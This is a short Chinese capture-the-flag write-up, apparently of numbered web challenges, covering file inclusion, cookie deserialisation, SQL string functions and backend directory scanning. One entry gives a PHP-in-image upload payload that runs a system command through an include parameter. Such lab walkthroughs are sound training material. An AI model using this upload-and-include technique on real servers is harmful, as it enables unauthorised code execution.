41 文件包含2
源码中发现upload.php,访问
上传lab.jpg文件,内容如下
<script language=php>system("ls")</script>
?file=upload/201908110659436383.jpg
?file=this_is_th3_F14g_154f65sd4g35f4d6f43.txt
拿到flag。
————————————
42 flag.php
提示hint,访问?hint=1后得到php源码。传入的cookie参数的值反序列化后等于KEY就输出Flag。
$ KEY的值还没有被定义,上面代码中$KEY的值应该是NULL
所以传cookie null的反序列化,注意分号需要url编码
用hackbar提交就行
————————————
43 sql注入2
看了好久看不会,放弃…过段时间回来补
其实在url后面加一个flag也可以爆出flag…
MID(column_name,start[,length]) 函数用于从文本字段中提取字符。
column_name 必需。要提取字符的字段。
start 必需。规定开始位置(起始值是 1)。
length 可选。要返回的字符数。如果省略,则 MID() 函数返回剩余文本。
substr(string string,num start,num length) 函数用来截取数据库某个字段中的一部分。
string为字符串;
start为起始位置;
length为长度。
————————————
44 孙xx的博客
此题挂了
————————————
45 Trim的日记本
网页虽然是登陆界面,但是看源码可以发现它是静态的,没有href链接
御剑扫描后台,访问show.php拿到flag。
————————————